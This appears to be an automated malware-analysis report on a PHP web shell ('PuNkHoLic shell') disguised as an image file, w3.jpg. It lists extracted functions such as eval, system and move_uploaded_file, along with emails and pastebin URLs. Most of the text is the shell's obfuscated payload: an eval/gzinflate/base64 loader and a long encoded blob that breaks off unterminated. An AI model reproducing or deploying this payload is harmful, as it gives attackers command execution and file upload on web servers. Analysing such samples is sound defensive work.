w3.jpg

md5: 2f32654d6bb2224d6e60ea6f48ef7551

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Emails
burdayimreis@gmail.com (Deobfuscated)
hacklinksatis@gmail.com (Deobfuscated)

Encoding
base64_decode (Deobfuscated, Original)
base64_encode (Deobfuscated)

Environment
error_reporting (Deobfuscated)
getcwd (Deobfuscated)
php_uname (Deobfuscated)
phpinfo (Deobfuscated)
set_time_limit (Deobfuscated)

Execution
eval (Deobfuscated, Original)
exec (Deobfuscated)
passthru (Deobfuscated)
shell_exec (Deobfuscated)
system (Deobfuscated)

Files
copy (Deobfuscated)
file_get_contents (Deobfuscated)
file_put_contents (Deobfuscated)
move_uploaded_file (Deobfuscated)

Input
_FILES (Deobfuscated)
_POST (Deobfuscated)

Title
PuNkHoLic shell</title>\r\n<link href=\"https://fonts.googleapis.com/css?family=Josefin+Sans:400,100\" rel=\"stylesheet\">\r\n</head>\r\n<style>\r\nbody{\r\nfont-family:Josefin Sans,sans-serif;\r\nbackground:black;\r\ncolor:#ABEFFF;\r\n}\r\n}\r\n.loginpage (Deobfuscated)

URLs
http://cur.cursors-4u.net/cursor.png (Deobfuscated)
http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur (Deobfuscated)
http://downloads.totallyfreecursors.com/cursor_files/pakistan.ani (Deobfuscated)
http://downloads.totallyfreecursors.com/thumbnails/PAKISTAN.gif (Deobfuscated)
http://i.imgur.com/il1o2RI.jpg (Deobfuscated)
http://i.imgur.com/t54UCIw.jpgl (Deobfuscated)
http://localhost/w3.jpg (HTML)
http://pastebin.com/raw.php?i=EXejgAMv (Deobfuscated)
http://pastebin.com/raw.php?i=PhSk7Kvq (Deobfuscated)
http://pastebin.com/raw.php?i=YUg4pXe2 (Deobfuscated)
http://pastebin.com/raw/2Ntdj7ju (Deobfuscated)
http://pastebin.com/raw/MxtcT6nX (Deobfuscated)
http://pastebin.com/raw/WSgkDHSN (Deobfuscated)
http://pastebin.com/raw/xCjJQYHH (Deobfuscated)
http://teledramasinhala.com/img/icons/image.js (Deobfuscated)
http://www (Deobfuscated)
http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html (Deobfuscated)
https://fonts.googleapis.com/css?family=Audiowide (Deobfuscated)
https://fonts.googleapis.com/css?family=Josefin+Sans:400,100 (Deobfuscated)
https://www.adminer.org/static/download/4.2.5/adminer-4.2.5-mysql-en.php (Deobfuscated)
https://www.facebook.com/niraj.ghimire.5454 (Deobfuscated)
www.facebook.com/PuNkHoLic (Deobfuscated)

Deobfuscated PHP code
<?php

$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$gzinflate = "=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